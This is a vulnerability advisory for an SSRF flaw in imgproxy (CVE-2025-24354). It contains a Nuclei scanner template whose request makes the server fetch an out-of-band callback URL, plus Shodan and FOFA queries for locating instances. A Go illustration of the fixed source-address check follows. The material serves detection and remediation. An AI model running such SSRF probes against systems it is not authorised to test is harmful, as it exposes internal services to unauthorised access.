Vulnerability description
imgproxy does not block the unspecified address 0.0.0.0 even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, so services listening on the imgproxy host can be exposed through it; exploitation requires network access.
id: CVE-2025-24354

info:
  name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)
  author: oksuzkayra
  severity: medium
  description: |
    imgproxy does not block the unspecified address 0.0.0.0 even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, so services listening on the imgproxy host can be exposed through it; exploitation requires network access.
  impact: |
    Local services may be exposed to unauthorized access, risking information disclosure or local system compromise.
  remediation: |
    The vulnerability has been fixed in imgproxy version 3.27.2: the source address verification now also rejects unspecified IP addresses (0.0.0.0) using the ip.IsUnspecified() function, in addition to the existing ip.IsLoopback() check.
  reference:
    - https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081
    - https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-24354
    cwe-id: CWE-918
    epss-score: 0.10553
    epss-percentile: 0.92517
  metadata:
    verified: true
    max-request: 1
    product: imgproxy
    shodan-query: http.html:"imgproxy"
    fofa-query: body="imgproxy"
  tags: cve,cve2025,imgproxy,ssrf,oast,oob

http:
  - method: GET
    path:
      - "{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 422"
          - "contains(body, 'Invalid source image')"
        condition: and
# digest: 4a0a00473045022100ab76800c48e7b89a1707475e4bbf2a9a069212357d1f2b22765b704b57973dad022065cd22cdebd6e7533f5cc9cbaf02733c892f5e61fc92f35c24c761e5115997e5:922c64590222798bb761d5b6d8e72950
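The check the remediation text describes, as an added Go illustration that is not imgproxy's own code: a loopback-only source check beside the corrected loopback-or-unspecified check, both applied to the IP-literal host of a source URL. The function names, the `SourceIPAllowed` wrapper and the sample URLs (203.0.113.10 is a documentation address) are constructed for this example.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
)

// Constructed illustration of the source-address policy in the advisory:
// loopback sources are refused unless allowLoopback is set (the role of
// IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES), and the fixed check also refuses
// the unspecified address, which the operating system routes to the local host.

var errSourceNotAllowed = errors.New("source address is not allowed")

// loopbackOnly mirrors the pre-3.27.2 behaviour: only net.IP.IsLoopback is
// tested, so 0.0.0.0 and :: pass even when loopback sources are disallowed.
func loopbackOnly(ip net.IP, allowLoopback bool) error {
	if !allowLoopback && ip.IsLoopback() {
		return errSourceNotAllowed
	}
	return nil
}

// loopbackOrUnspecified mirrors the fix: net.IP.IsUnspecified is checked as
// well, so 0.0.0.0 and :: fall under the same policy as 127.0.0.1 and ::1.
func loopbackOrUnspecified(ip net.IP, allowLoopback bool) error {
	if !allowLoopback && (ip.IsLoopback() || ip.IsUnspecified()) {
		return errSourceNotAllowed
	}
	return nil
}

// SourceIPAllowed extracts the host of a source URL and applies the chosen
// check. Only IP-literal hosts are handled here; a real deployment must
// resolve hostnames and check every resolved address, because the policy is
// about where the fetch actually connects, not how the host is spelled.
// It returns (allowed, err); err is non-nil only when the URL cannot be
// evaluated at all.
func SourceIPAllowed(rawURL string, allowLoopback bool, check func(net.IP, bool) error) (bool, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return false, err
	}
	ip := net.ParseIP(u.Hostname())
	if ip == nil {
		return false, fmt.Errorf("host %q is not an IP literal; resolve it and check each address", u.Hostname())
	}
	if err := check(ip, allowLoopback); err != nil {
		return false, nil
	}
	return true, nil
}

func main() {
	// Constructed sample sources; loopback sources disallowed in both runs.
	for _, src := range []string{"http://127.0.0.1/", "http://0.0.0.0/", "http://[::]/", "http://203.0.113.10/"} {
		before, _ := SourceIPAllowed(src, false, loopbackOnly)
		after, _ := SourceIPAllowed(src, false, loopbackOrUnspecified)
		fmt.Printf("%-22s before fix: allowed=%-5v after fix: allowed=%v\n", src, before, after)
	}
}
```

The wrapper deliberately refuses to decide on a hostname: the Nuclei template above sends a hostname (the interactsh domain), and the real defence has to be applied to the resolved addresses at connection time, otherwise a name that resolves to a loopback or unspecified address sidesteps a check done on the URL string.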